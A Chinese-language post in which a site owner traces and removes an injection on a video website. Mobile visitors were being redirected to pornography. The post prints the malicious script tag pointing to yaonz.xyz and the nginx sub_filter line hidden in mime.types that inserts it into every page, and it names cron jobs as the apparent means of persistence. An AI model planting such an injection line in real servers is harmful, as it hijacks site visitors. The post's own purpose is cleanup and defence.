我的影视网站被挂马了!!
我的影视网站被挂马了!!http://www.yaonz.xyz/moment.js 就是这个js文件,使用手机访问的时候会跳黄。
我是这样解决的。
1.检查定时任务:在 SSH 输入 crontab -l。黑客常设定每分钟检查并重新写入木马。
crontab -l输出为:
[root@kvm-2hk8820 ~]# crontab -l
*/3 * * * * /www/server/cron/1231997074b0061801f09125578f4e6e >> /www/server/cron/1231997074b0061801f09125578f4e6e.log 2>&1
14 13 * * * /www/server/cron/3ab48c27ec99cb9787749c362afae517 >> /www/server/cron/3ab48c27ec99cb9787749c362afae517.log 2>&1
*/20 * * * * /www/server/cron/c6a2b972f277720e7c28719fc527ab1b >> /www/server/cron/c6a2b972f277720e7c28719fc527ab1b.log 2>&1
30 1 */3 * * /www/server/cron/938609c585c5f17f1d3b4d011024ee0e >> /www/server/cron/938609c585c5f17f1d3b4d011024ee0e.log 2>&1
*/10 * * * * /www/server/cron/3991490181e1ecdc068158ed07cb99e2 >> /www/server/cron/3991490181e1ecdc068158ed07cb99e2.log 2>&1
30 3 * * * /www/server/cron/19342377d9f22f32807eea11ad3eb9f9 >> /www/server/cron/19342377d9f22f32807eea11ad3eb9f9.log 2>&1
10 4 * * * /www/server/cron/6593b58256cfbd723ff01d93b508a246 >> /www/server/cron/6593b58256cfbd723ff01d93b508a246.log 2>&1
30 4 * * * /www/server/cron/7fa1a1f2d91a436744562d1df1ae7164 >> /www/server/cron/7fa1a1f2d91a436744562d1df1ae7164.log 2>&1
20 * * * * /www/server/cron/f5ce67a3afda0383c6ec776a6b5f4d01 >> /www/server/cron/f5ce67a3afda0383c6ec776a6b5f4d01.log 2>&1
45 * * * * /www/server/cron/fbbf688a3c5b437f64ae91588b9a2ce2 >> /www/server/cron/fbbf688a3c5b437f64ae91588b9a2ce2.log 2>&1
*/5 * * * * /www/server/cron/ba5bf005b54fe399295df53fd4ddea93 >> /www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log 2>&1
16 * * * * /www/server/cron/523d24d6555b22663d87b4ea09779dbf >> /www/server/cron/523d24d6555b22663d87b4ea09779dbf.log 2>&1
12 * * * * /www/server/cron/c8fb9f932ba39c2c0897b9cfce7b2c0f >> /www/server/cron/c8fb9f932ba39c2c0897b9cfce7b2c0f.log 2>&1
20 2 * * * /www/server/cron/0193896471cf1065d7693b556b9d71db >> /www/server/cron/0193896471cf1065d7693b556b9d71db.log 2>&1
42 1 * * * /www/server/cron/ced223288914d9300c9fd3ced7e63445 >> /www/server/cron/ced223288914d9300c9fd3ced7e63445.log 2>&1
32 1 * * * /www/server/cron/1ef530e6a894a434e5391324584bae54 >> /www/server/cron/1ef530e6a894a434e5391324584bae54.log 2>&1
32 * * * * /www/server/cron/16d9cb0b684b9caff98d2e548b2dffd7 >> /www/server/cron/16d9cb0b684b9caff98d2e548b2dffd7.log 2>&1
4 * * * * /www/server/cron/ff09cf4ddd83652c67871b40ce49eebf >> /www/server/cron/ff09cf4ddd83652c67871b40ce49eebf.log 2>&1
30 * * * * /www/server/cron/de45340d07d40cab297153d42edbecf7 >> /www/server/cron/de45340d07d40cab297153d42edbecf7.log 2>&1
1 */2 * * * /www/server/cron/ae3ba4efd2369aff994c98ec34f1c97c >> /www/server/cron/ae3ba4efd2369aff994c98ec34f1c97c.log 2>&1
*/5 * * * * /www/server/cron/f865a42229ab377f379b325640764e3b >> /www/server/cron/f865a42229ab377f379b325640764e3b.log 2>&1
50 3 * * * /www/server/cron/ac91f3ba9a7a89ced7f445f6870fc4fb >> /www/server/cron/ac91f3ba9a7a89ced7f445f6870fc4fb.log 2>&1
10 1 * * * /www/server/cron/efaafce13d0f8dc53407b35c733cc10d >> /www/server/cron/efaafce13d0f8dc53407b35c733cc10d.log 2>&1
40 2 * * 1 /www/server/cron/ae4fbb6ad62403fcf6c0a07cd789247c >> /www/server/cron/ae4fbb6ad62403fcf6c0a07cd789247c.log 2>&1
13 1 * * * /www/server/cron/3fe42ff05568b9cb1752cd1ed6875aa0 >> /www/server/cron/3fe42ff05568b9cb1752cd1ed6875aa0.log 2>&12.查找包含恶意代码的任务
grep -r "yaonz.xyz" /www/server/cron/输出为: (截取的部分内容)
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>确定投毒源:grep 结果证明,劫持脚本是由 3991490181e1ecdc068158ed07cb99e2 和 ba5bf005b54fe399295df53fd4ddea93 这两个计划任务生成的。
3. 立即删除恶意计划任务
rm -f /www/server/cron/3991490181e1ecdc068158ed07cb99e2
rm -f /www/server/cron/ba5bf005b54fe399295df53fd4ddea93
rm -f /www/server/cron/*.log4. 计划写入任务删除了,就找具体的代码在哪里
搜索整个 Nginx 和防火墙目录
grep -rn "yaonz" /www/server/panel/plugin/waf/
grep -rn "yaonz" /www/server/nginx/输出为:
[root@kvm-2hk8820 ~]# grep -rn "yaonz" /www/server/panel/plugin/waf/
grep: /www/server/panel/plugin/waf/: No such file or directory
[root@kvm-2hk8820 ~]# grep -rn "yaonz" /www/server/nginx/
/www/server/nginx/conf/mime.types:101:sub_filter '</head>' '<script src="//www.yaonz.xyz/moment.js"></script>\r\n</head>';
[root@kvm-2hk8820 ~]# [root@kvm-2hk8820 ~]# 这时候已经出来了文件地址了。
/www/server/nginx/conf/mime.types 进入这个文件里,最后一行 删除这一整行,问题至此解决。
